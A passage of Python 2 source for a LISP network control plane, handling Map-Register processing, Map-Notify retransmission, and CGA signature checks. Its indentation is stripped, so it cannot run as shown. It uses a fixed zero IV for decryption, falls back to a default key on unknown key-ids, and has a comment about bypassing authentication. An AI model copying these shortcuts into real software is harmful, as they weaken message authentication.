map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
